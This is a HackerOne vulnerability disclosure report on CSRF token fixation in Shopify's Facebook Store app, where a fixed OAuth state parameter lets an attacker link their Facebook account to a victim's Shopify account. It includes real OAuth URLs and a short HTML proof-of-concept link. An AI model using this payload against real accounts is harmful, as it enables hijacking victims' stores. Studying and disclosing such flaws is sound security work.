Shopify: CSRF token fixation in facebook store app that can lead to adding attacker to victim acc

2015-04-11T14:06:20
ID H1:55911
Type hackerone
Reporter defmax
Modified 2015-06-25T20:05:05

Description

hey guys

i just found an csrf token fixation in facebook store app which is an offical shopify app

link >> https://docs.shopify.com/manual/more/official-shopify-apps/facebook-store

The CSRF bug which connects attacker's Facebook account to victim's shopify account. This is done by exploiting 'Connect with Facebook' function.

When using 'Connect with Facebook' function. A request is sent to facebook to authorize the shopify app. After authorizing a 'access token' is sent in response which shopify app verifies and connects the account. the verification is done by csrf token "state parameter "

here state parameter is getting fixed here

1st oauth request

https://graph.facebook.com/oauth/authorize?client_id=410312912374011&display=popup&redirect_uri=https%3A%2F%2Ffacebookstore.shopifyapps.com%2Fauthenticated&response_type=code&scope=manage_pages+email&state=c2f449f2df5ee64df6173702846bce72e3a57319

then when it autorized , we will get this get !

https://facebookstore.shopifyapps.com/authenticated?code=AQDdi9hS-WHa-jnVj3Cm63b_gc68E6vjm6xxoalbiwX0fmWtH91HdRI6vjkg2TmjGGJZcmQI4hHO1J8PC_CF7z5-vmxxaXjQQtBadOiwuYGPUrvpmsP2OkVAjFiLUzYDwn6O778zSz6Hb4nYlsW5OUz0QrdQLMY8aWTXKZnywzpQPz-Xx1q9DU4_mFotq7IaYgSvmbWDPNeM05FY4XCEKYIVKtB0Jpx2_hHG9ft_xXcAfh8sKnNzeEkgWrcGfqXnH-h2EYvCB57gB0qj6ec7O-5SUlo6B4qPq4HywEqYaPXO2yj0npE9BkAJWjwCWMbeTw&state=c2f449f2df5ee64df6173702846bce72e3a57319#=_

now how many times you autorize the state parameter will be same ! once the attacker gets state parameter by xss or any method , he can make csrf lifelong posible

exploit code

<html> <body> <a href=https://facebookstore.shopifyapps.com/authenticated?code=[[attacker_token ]&state=c2f449f2df5ee64df6173702846bce72e3a57319#_=_> </body> </html>

hope this bug will be fixed soon